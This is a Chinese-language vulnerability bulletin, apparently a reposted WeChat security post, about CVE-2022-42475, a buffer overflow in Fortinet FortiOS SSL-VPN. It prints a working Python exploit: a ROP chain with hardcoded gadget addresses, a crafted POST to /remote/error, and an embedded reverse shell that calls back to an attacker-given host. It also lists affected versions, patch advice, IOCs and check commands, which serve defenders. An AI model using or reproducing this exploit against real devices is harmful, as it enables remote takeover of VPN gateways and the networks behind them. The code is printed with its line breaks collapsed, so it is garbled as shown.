漏洞速递 | CVE-2022-42475 VPN远程代码执行漏洞
2023-3-21 10:42:39 Author: 渗透Xiao白帽(查看原文) 阅读量:45 收藏

0x01 前言

Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。

0x02 漏洞描述

 由于sslvpnd对用户输入的内容验证存在缺陷,未经身份验证的攻击者通过发送特制数据包触发缓冲区溢出,最终可实现在目标系统上执行任意代码。

        PoC:

import socketimport sslfrom pwn import *import timeimport sysimport requests
context = ssl.SSLContext()target_host = sys.argv[1]target_port = sys.argv[2]reverse = sys.argv[3]params = sys.argv[4].split(" ")strparams = "["for param in params: strparams += "'"+param+"',"strparams = strparams[:-1]strparams += "]"

#binary functionsexecve = p64(0x0042e050)
#binary gadgetsmovrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)jmprax = p64(0x0000000000433181)#: jmp rax)pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)poprax = p64(0x00000000004359af)# : pop rax ; ret)gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; retpoprdi = p64(0x000000000042ed7e)# : pop rdi ; retrax3 = gadget1


#hardcoded value which would probably need to be bruteforced or leakedhardcoded = 0x00007fc5f128e000
scbase = p64(hardcoded)rdi = p64(hardcoded + 0xc48)cmd = p64(hardcoded + 0xd38)asdf = hardcoded + 0xd38cmd1 = p64(asdf)cmd2 = p64(asdf+16)arg1 = p64(asdf+48)arg2 = p64(asdf+56)arg3 = p64(asdf+64)
ropchain = popraxropchain += execveropchain += poprdiropchain += cmd1ropchain += poprsiropchain += cmd2ropchain += poprdxropchain += p64(0)ropchain += jmpraxropchain += b"/bin/python\x00\x00\x00\x00\x00"ropchain += arg1ropchain += arg2ropchain += arg3ropchain += p64(0)ropchain += b"python\x00\x00"ropchain += b"-c\x00\x00\x00\x00\x00\x00"ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""


try: with socket.create_connection((target_host, int(target_port,10))) as sock: with context.wrap_socket(sock, server_hostname=target_host) as ssock: ssock.settimeout(2) context.verify_mode = ssl.CERT_NONE payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload ssock.sendall(tosend) r = ssock.recv(10024)except Exception as e: print("Exception occurred :"+ repr(e))

0x03 影响范围

受影响版本
2.0 <= FortiOS <= 7.2.20.0 <= FortiOS <= 7.0.84.0 <= FortiOS <= 6.4.102.0 <= FortiOS <= 6.2.110.0 <= FortiOS-6K7K <= 7.0.74.0 <= FortiOS-6K7K <= 6.4.92.0 <= FortiOS-6K7K <= 6.2.110.0 <= FortiOS-6K7K <= 6.0.14
不受影响版本FortiOS >= 7.2.3FortiOS >= 7.0.9FortiOS >= 6.4.11FortiOS >= 6.2.12FortiOS-6K7K >= 7.0.8FortiOS-6K7K >= 6.4.10FortiOS-6K7K >= 6.2.12FortiOS-6K7K >= 6.0.15

0x04 修复方案

目前官方已发布安全版本修复此漏洞建议受影响的用户及时升级防护:https://docs.fortinet.com/product/fortigate/7.2

用户还可根据官方公布的IOC进行自查,验证自身系统是否遭受攻击。

检查系统中是否存在以下日志条目:

 Logdesc=”Application crashed” and msg=”[…] application:sslvpnd,[…], Signal 11 received, Backtrace: […]”

检查系统中是否存在以下文件:

/data/lib/libips.bak/data/lib/libgif.so/data/lib/libiptcp.so/data/lib/libipudp.so/data/lib/libjepg.so/var/.sslvpnconfigbk/data/etc/wxd.conf/flash

用户可通过以下命令来对上述文件进行检查:

diagnose sys last-modified-files /data/libdiagnose sys last-modified-files /var/diagnose sys last-modified-files /data/etc/diagnose sys last-modified-files /flash

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247497268&idx=1&sn=38edaf63d963ac9d82e00d6741e07a2d&chksm=ea34096edd4380783df78278466529ef782b13780ba63f0ee5afda94937744f0d96b19ab2304#rd
如有侵权请联系:admin#unsafe.sh